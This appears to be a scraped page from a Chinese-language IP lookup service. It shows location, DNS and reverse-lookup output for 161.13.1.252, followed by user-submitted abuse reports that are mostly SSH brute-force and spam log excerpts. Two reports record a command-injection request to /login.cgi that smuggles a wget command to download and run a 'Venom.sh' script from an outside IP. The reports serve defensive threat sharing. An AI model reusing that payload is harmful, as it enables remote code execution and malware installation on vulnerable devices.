161.13.1.252 - IPInfo

基本信息:

城市(city): Georgetown

省份(region): Texas

国家(country): United States

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:

点此参与IP信息讨论

暂无关于此IP的讨论, 沙发请点上方按钮

相同子网IP讨论:

暂无关于此IP所属子网相关IP的讨论.

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 161.13.1.252
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 33796
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;161.13.1.252.			IN	A

;; AUTHORITY SECTION:
.			598	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020040100 1800 900 604800 86400

;; Query time: 54 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Apr 01 21:26:53 CST 2020
;; MSG SIZE  rcvd: 116

HOST信息:

252.1.13.161.in-addr.arpa domain name pointer afsterm.southwestern.edu.

NSLOOKUP信息:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
252.1.13.161.in-addr.arpa	name = afsterm.southwestern.edu.

Authoritative answers can be found from:

最新评论:

IP	类型	评论内容	时间
178.93.28.162	attackspam	Dec 23 07:13:52 mxgate1 postfix/postscreen[21830]: CONNECT from [178.93.28.162]:44095 to [176.31.12.44]:25 Dec 23 07:13:52 mxgate1 postfix/dnsblog[21970]: addr 178.93.28.162 listed by domain zen.spamhaus.org as 127.0.0.11 Dec 23 07:13:52 mxgate1 postfix/dnsblog[21970]: addr 178.93.28.162 listed by domain zen.spamhaus.org as 127.0.0.3 Dec 23 07:13:52 mxgate1 postfix/dnsblog[21970]: addr 178.93.28.162 listed by domain zen.spamhaus.org as 127.0.0.4 Dec 23 07:13:52 mxgate1 postfix/dnsblog[21971]: addr 178.93.28.162 listed by domain cbl.abuseat.org as 127.0.0.2 Dec 23 07:13:52 mxgate1 postfix/dnsblog[21968]: addr 178.93.28.162 listed by domain b.barracudacentral.org as 127.0.0.2 Dec 23 07:13:53 mxgate1 postfix/postscreen[21830]: PREGREET 36 after 0.66 from [178.93.28.162]:44095: EHLO 162-28-93-178.pool.ukrtel.net Dec 23 07:13:53 mxgate1 postfix/dnsblog[21967]: addr 178.93.28.162 listed by domain ix.dnsbl.xxxxxx.net as 127.0.0.2 Dec 23 07:13:53 mxgate1 postfix/postscreen[218........ -------------------------------	2019-12-23 17:51:14
185.176.27.254	attack	12/23/2019-04:25:18.537125 185.176.27.254 Protocol: 6 ET DROP Dshield Block Listed Source group 1	2019-12-23 18:17:03
206.189.171.204	attack	Dec 23 10:04:03 game-panel sshd[13868]: Failed password for root from 206.189.171.204 port 50308 ssh2 Dec 23 10:09:14 game-panel sshd[14162]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.171.204 Dec 23 10:09:16 game-panel sshd[14162]: Failed password for invalid user gateway from 206.189.171.204 port 54624 ssh2	2019-12-23 18:15:45
58.20.139.26	attackspambots	Dec 23 10:34:23 lnxmysql61 sshd[25365]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.20.139.26	2019-12-23 18:13:05
41.40.22.3	attackbots	2 attacks on wget probes like: 41.40.22.3 - - [22/Dec/2019:05:22:24 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 18:20:26
39.78.92.84	attackspam	Telnet Server BruteForce Attack	2019-12-23 18:01:56
179.162.116.117	attack	Unauthorized connection attempt detected from IP address 179.162.116.117 to port 445	2019-12-23 17:49:02
210.71.232.236	attackspambots	Dec 23 14:54:06 gw1 sshd[15791]: Failed password for mail from 210.71.232.236 port 47274 ssh2 ...	2019-12-23 18:14:01
5.133.66.80	attackspam	Lines containing failures of 5.133.66.80 Dec 23 06:02:52 shared04 postfix/smtpd[9630]: connect from fruhostname.tamnhapho.com[5.133.66.80] Dec 23 06:02:53 shared04 policyd-spf[10880]: prepend Received-SPF: Pass (mailfrom) identhostnamey=mailfrom; client-ip=5.133.66.80; helo=fruhostname.offshomal.com; envelope-from=x@x Dec x@x Dec 23 06:02:53 shared04 postfix/smtpd[9630]: disconnect from fruhostname.tamnhapho.com[5.133.66.80] ehlo=1 mail=1 rcpt=0/1 data=0/1 quhostname=1 commands=3/5 Dec 23 06:02:57 shared04 postfix/smtpd[9630]: connect from fruhostname.tamnhapho.com[5.133.66.80] Dec 23 06:02:57 shared04 policyd-spf[10880]: prepend Received-SPF: Pass (mailfrom) identhostnamey=mailfrom; client-ip=5.133.66.80; helo=fruhostname.offshomal.com; envelope-from=x@x Dec x@x Dec 23 06:02:57 shared04 postfix/smtpd[9630]: disconnect from fruhostname.tamnhapho.com[5.133.66.80] ehlo=1 mail=1 rcpt=0/1 data=0/1 quhostname=1 commands=3/5 Dec 23 06:03:40 shared04 postfix/smtpd[9630]: connec........ ------------------------------	2019-12-23 17:57:47
168.128.86.35	attackspambots	Dec 22 23:57:43 hpm sshd\[526\]: Invalid user joomla from 168.128.86.35 Dec 22 23:57:43 hpm sshd\[526\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=168.128.86.35 Dec 22 23:57:45 hpm sshd\[526\]: Failed password for invalid user joomla from 168.128.86.35 port 52602 ssh2 Dec 23 00:05:05 hpm sshd\[1391\]: Invalid user skage from 168.128.86.35 Dec 23 00:05:05 hpm sshd\[1391\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=168.128.86.35	2019-12-23 18:06:33
41.42.42.7	attack	1 attack on wget probes like: 41.42.42.7 - - [22/Dec/2019:02:17:46 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 18:01:43
118.69.34.194	attackspam	Scanning random ports - tries to find possible vulnerable services	2019-12-23 17:51:44
93.90.74.240	attackspambots	Dec 23 07:26:36 vps58358 sshd\[29530\]: Invalid user dnlee from 93.90.74.240Dec 23 07:26:38 vps58358 sshd\[29530\]: Failed password for invalid user dnlee from 93.90.74.240 port 59507 ssh2Dec 23 07:27:05 vps58358 sshd\[29532\]: Invalid user aggergaard from 93.90.74.240Dec 23 07:27:07 vps58358 sshd\[29532\]: Failed password for invalid user aggergaard from 93.90.74.240 port 60635 ssh2Dec 23 07:27:30 vps58358 sshd\[29534\]: Failed password for root from 93.90.74.240 port 33528 ssh2Dec 23 07:27:54 vps58358 sshd\[29540\]: Failed password for root from 93.90.74.240 port 34654 ssh2 ...	2019-12-23 17:49:38
151.84.135.188	attackbotsspam	Dec 23 11:56:56 server sshd\[7569\]: Invalid user git from 151.84.135.188 Dec 23 11:56:56 server sshd\[7569\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=151.84.135.188 Dec 23 11:56:59 server sshd\[7569\]: Failed password for invalid user git from 151.84.135.188 port 50242 ssh2 Dec 23 12:04:35 server sshd\[9405\]: Invalid user husemoen from 151.84.135.188 Dec 23 12:04:35 server sshd\[9405\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=151.84.135.188 ...	2019-12-23 17:48:38
160.153.245.134	attackbots	Dec 23 07:20:11 sip sshd[14672]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=160.153.245.134 Dec 23 07:20:13 sip sshd[14672]: Failed password for invalid user bot from 160.153.245.134 port 46358 ssh2 Dec 23 07:27:56 sip sshd[14753]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=160.153.245.134	2019-12-23 17:47:54

最近上报的IP列表

108.113.169.142	211.120.18.158	5.115.67.162	177.3.40.44
166.188.27.118	66.77.239.137	189.106.107.150	116.177.83.134
96.155.160.164	199.202.160.8	99.176.105.211	217.70.23.180
13.192.35.156	176.169.101.52	116.203.246.155	60.216.98.154
103.122.92.48	185.23.80.134	211.195.134.42	51.178.169.225